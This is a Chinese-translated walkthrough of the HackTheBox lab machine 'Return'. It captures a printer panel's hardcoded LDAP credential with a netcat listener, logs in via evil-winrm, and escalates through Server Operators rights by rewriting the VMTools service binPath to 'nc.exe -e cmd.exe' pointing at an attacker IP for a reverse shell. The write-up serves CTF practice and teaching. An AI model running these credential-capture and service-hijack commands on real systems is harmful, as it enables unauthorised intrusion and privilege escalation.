Return是HTB上的Windows机器,被评为简单,此框是在具有弱服务权限的窗口上设计的。如果总结一下,我们将滥用打印机管理门户通过netcat获取硬编码的凭据,并将其用于WinRM登录。打印机服务帐户是服务器操作员组的成员,该组允许停止和启动某些服务。因此,我们利用弱配置的服务来执行我们的恶意exe文件,滥用服务器操作员的权限。
原文链接:https://www.hackingarticles.in/return-hackthebox-walkthrough/
目录
初始访问
- 列举
- 凭据转储
- 有效账户
- 用户标志
权限提升
- 滥用弱服务权限
- 根滞后
让我们深入研究一下。
初始访问
首先,我们对机器的IP地址进行Nmap扫描,找到打开的端口,并观察到一些端口是打开的,从微软服务中我们了解了它的Windows操作系统。
nmap -sV -sC 10.129.31.220
列举
由于端口80是打开的,让我们尝试通过浏览器访问IP地址。
如您所见,我们可以访问打印机管理面板。这些页面正在运行 PHP。让我们导航到设置选项卡。
上面的设置向我们显示了svc打印机的用户名和已屏蔽的硬编码密码。服务器地址字段是唯一用作参数的字段,然后按下更新按钮。因此,打印机正在与端口 389 上的本地地址进行通信。
如果我们使用端口389将服务器地址替换为攻击机IP地址怎么办?
凭据转储
一旦我们从攻击者的IP(Kali Linux)中替换了服务器地址,我们就在kali机器上的端口389上启动了Netcat侦听器。
nc -lvp 389
点击更新按钮后,我们获得了密码“1edFg43012!”
WinRM 有效账户
让我们使用邪恶的 winrm 来建立远程连接。这可以通过发出以下命令来完成:
evil-winrm -i 10.129.31.219 -u svc-printer -p “1edFg43012!!”
我们可以访问服务器。让我们浏览到桌面目录,看看是否能找到任何标志。实际上,如上面的屏幕截图所示,我们可以找到用户.txt标志。
权限提升
现在,我们有权访问计算机,让我们验证我们拥有的用户权限或组。
为了验证这一点,我们发出命令 net user svc-printer
从下面的屏幕截图中,我们可以看到实际用户是服务器操作员组的成员。
具有服务器操作员组成员身份的用户可以执行哪些操作?
服务器操作员可以启动和停止服务。
服务器操作员组被视为服务管理员,可以更改域控制器上安装的二进制文件,从此处阅读更多内容。
upload /usr/share/windows-binaries/nc.exe
因此,我们首先上传 nc.exe windows 二进制文件,然后枚举已安装的服务以进一步利用。
services
我们找到了已安装服务及其路径的列表,以及权限的真/假标志。
滥用弱服务权限
在这里,我们需要分析可以修改哪个二进制路径来执行nc.exe文件
首先,我们尝试窗口防御程序更改 WinDefend 的二进制路径,但收到访问被拒绝错误。
sc.exe config WinDefend binPath=”C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234″
然后,我们尝试修改 VMTools 的二进制路径,最后这对我们有用。
sc.exe config VMTools binPath=”C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234″
由于SVC打印机是服务器操作员的成员,因此我们可以重新启动服务以获得反向连接。因此,让我们通过发出以下命令来停止和启动服务 VMTools:
sc.exe stop VMTools
sc.exe start VMTools
在启动服务虚拟机工具之前,我们确保 netcat 正在侦听端口 1234,如下所示。
一旦服务停止并启动,我们就得到了netcat会话作为获取 Root 标志。
作者:Tirut Hawoldar是一位网络安全爱好者和CTF玩家,在IT安全和基础设施方面拥有15年的经验。可在LinkedIn联系